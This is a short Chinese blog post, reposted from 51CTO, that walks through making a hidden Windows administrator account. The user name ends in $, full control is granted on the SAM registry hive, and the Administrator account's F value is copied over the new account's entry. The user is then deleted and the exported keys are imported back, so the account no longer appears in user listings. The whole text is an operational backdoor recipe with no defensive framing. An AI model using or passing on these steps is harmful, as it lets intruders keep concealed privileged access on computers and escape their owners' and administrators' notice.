命令是: net user /add 用户名 密码
看一下我们刚才创建的账户 没有 因为我们在后面加了一个$所以是看不到的
命令是:net user
我们在计算机管理里面 能看到
进入注册表 命令是: regedit
展开注册表 HKEY_LOCAL_MACHINE→SAM→SAM 然后选择“SAM”右键选择权限
在“完全控制”后面打上“√”然后点击确定
确定完之后不会出来 + 号 按一下“F5”刷新一下就出来了
位置是 SAM→Domains→Account→Users→Names
首先找到管理员的那个权限所在地
Administrative-----------------------000001F4
然后 找到“F”值 这个数值在 “000001F4”里面复制里面的信息
被提权的账户
abc$---------------------------------000003ED
粘贴到里面 替换原来的
把 “abc$”导出,放到一个地方
把“000003ED”也导出
现在我们删除用户命令是 net user /del abc$
在本地用户和组里面看不到刚才那个账户了
把刚才 导出的两个键值 导入回去
然后注销 按两下 Ctrl+Alt+Del 在弹出来的输入帐号和密码
看一下账户名称 是我们刚才注册的那个
本文转自 149banzhang 51CTO博客,原文链接:http://blog.51cto.com/149banzhang/849824,如需转载请自行联系原作者
